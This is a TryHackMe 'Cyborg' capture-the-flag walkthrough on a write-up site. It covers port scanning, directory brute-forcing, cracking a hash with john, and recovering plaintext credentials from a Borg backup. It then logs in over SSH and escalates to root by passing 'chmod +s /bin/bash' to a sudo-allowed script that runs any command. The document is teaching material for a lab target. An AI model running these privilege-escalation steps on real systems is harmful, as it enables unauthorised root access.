Writeups
  • Writeups
    • TryHackMe
      • 🕵️‍♀️Basic Pentesting
      • 🔷Blue
      • ⚡Bolt
      • 🤖Cyborg
      • 🃏HA Jocker CTF
      • 🧊Ice
      • 🕯️Ignite
      • 🎃Jack-of-All-Trades
      • 🎩Mr Robot
      • 🔓Overpass
      • 🥒Pickle Rick
      • 💻RootMe
      • 🐇Year of the Rabbit
    • Vulnhub
      • 📦Colddbox
      • 💱Crypto Bank
      • 🛰️GoldenEye
      • 🎊Hacker Fest
      • 🤠Lampiao
      • ✴️Node
      • ♟️PWNLAB
      • 🔓Solid State
      • 📎Stapler
    • CTFs
      • 🤐Zippy
    • Demos
      • 🤒AMSI bypass using Python
      • 🌆Steganography tools
Powered by GitBook
On this page
  • 1.Scanning
  • 1.1 Nmap
  • 2. Reconnaisance
  • 2.1 Gobuster
  • 2.2 John
  • 2.3 /admin
  • 2.4 Borg Backup
  • 3. Gaining Access
  • 3.1 SSH
  • 4. Privilege Escalation
  1. Writeups
  2. TryHackMe

Cyborg

PreviousBoltNextHA Jocker CTF

Last updated 2 years ago

A box involving encrypted archives, source code analysis and more.

1.Scanning

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -Pn -sC -sV 10.10.116.223   

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 12:19 IST
Nmap scan report for 10.10.116.223
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp   open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
5357/tcp filtered wsdapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.39 seconds

  • We find 2 open ports. 22 and 80 running ssh and a web server respectively

  • Port 80 takes us to a default Apache homepage

2. Reconnaisance

2.1 Gobuster

  • Directory brute forcing using gobuster on port 80

gobuster dir -u http://10.10.116.223 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.116.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/16 12:20:00 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 314] [--> http://10.10.116.223/admin/]
/etc                  (Status: 301) [Size: 312] [--> http://10.10.116.223/etc/]  
/server-status        (Status: 403) [Size: 278]                                  
                                                                                 
===============================================================
2022/07/16 12:25:45 Finished
===============================================================

  • Going over to /etc directory, we find a hash at /etc/squid/passwd to a music_archive

2.2 John

  • Coping the hash to hash.txt and running john to crack it

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  

Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2022-07-16 12:43) 1.666g/s 64960p/s 64960c/s 64960C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed

  • We get a potential password squidward

2.3 /admin

  • Going over to /admin directory

  • Navigating the webpage to /admin/admin.html, we find a conversation

  • Here, there is a mention of squid proxy , and a backup of music_archive as well as potential usernames Josh, Adam and Alex

  • We can find the archive, and it has an option to download it from the homepage

  • Downloading the archive archive.tar and extracting it

tar -xvf archive.tar 

home/field/dev/final_archive/
home/field/dev/final_archive/hints.5
home/field/dev/final_archive/integrity.5
home/field/dev/final_archive/config
home/field/dev/final_archive/README
home/field/dev/final_archive/nonce
home/field/dev/final_archive/index.5
home/field/dev/final_archive/data/
home/field/dev/final_archive/data/0/
home/field/dev/final_archive/data/0/5
home/field/dev/final_archive/data/0/3
home/field/dev/final_archive/data/0/4
home/field/dev/final_archive/data/0/1

  • Reading the README file, we see that it is a Borg backup repository, and it gives us a link to the documentation

cat home/field/dev/final_archive/README 

This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

2.4 Borg Backup

  • We can install borg in our Debian system with apt install borgbackup

  • We can list the files present using the option list and the path of the archive. A password is prompted, and we can use squidward which we had cracked earlier from the hash to show the archive

borg list home/field/dev/final_archive 

Enter passphrase for key /home/joseph/Desktop/Pentest/THM/cyborg/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 19:30:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

  • We can extract the files in archive with the command extract and specifying the archive name

borg extract home/field/dev/final_archive/::music_archive 

Enter passphrase for key /home/joseph/Desktop/Pentest/THM/cyborg/home/field/dev/final_archive: 
~/Desktop/Pentest/THM/cyborg ❯ ls                                                                            5s
archive.tar  hash.txt  home
~/Desktop/Pentest/THM/cyborg ❯ cd home 
~/Desktop/Pentest/THM/cyborg/home ❯ ls
alex  field

  • The archive got extracted to the home directory

  • There is a note.txt in home/alex/Documents

Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

This might be the login creds of alex

alex : S3cretP@s3

3. Gaining Access

3.1 SSH

  • We can ssh into the target with the credentials that we found.

ssh alex@10.10.116.223

The authenticity of host '10.10.116.223 (10.10.116.223)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.116.223' (ECDSA) to the list of known hosts.
alex@10.10.116.223's password: 

Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

  • We can see that Alex can run /etc/mp3backups/backup.sh as root

sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

4. Privilege Escalation

  • Reading the script, we find that it is a script that compress mp3 files to an archive and can execute the command that we provide.

#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt


input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
  #a="/etc/mp3backups/backed_up_files.txt"
#  b=$(basename $input)
  #echo
#  echo "$line"
#done < "$input"

while getopts c: flag
do
	case "${flag}" in 
		c) command=${OPTARG};;
	esac
done



backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"

echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd

  • We can provide any command to run using -c

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh -c "chmod +s /bin/bash"
/home/alex/Music/image12.mp3
/home/alex/Music/image7.mp3
/home/alex/Music/image1.mp3
/home/alex/Music/image10.mp3
/home/alex/Music/image5.mp3
/home/alex/Music/image4.mp3
/home/alex/Music/image3.mp3
/home/alex/Music/image6.mp3
/home/alex/Music/image8.mp3
/home/alex/Music/image9.mp3
/home/alex/Music/image11.mp3
/home/alex/Music/image2.mp3

bash-4.3$ bash -p
bash-4.3 whoami
root
bash-4.3 cd /root/
bash-4.3 ls
root.txt
bash-4.3 cat root.txt

Reading the , we can see that Borg is a backup program with compression and encryption support

🤖
documentations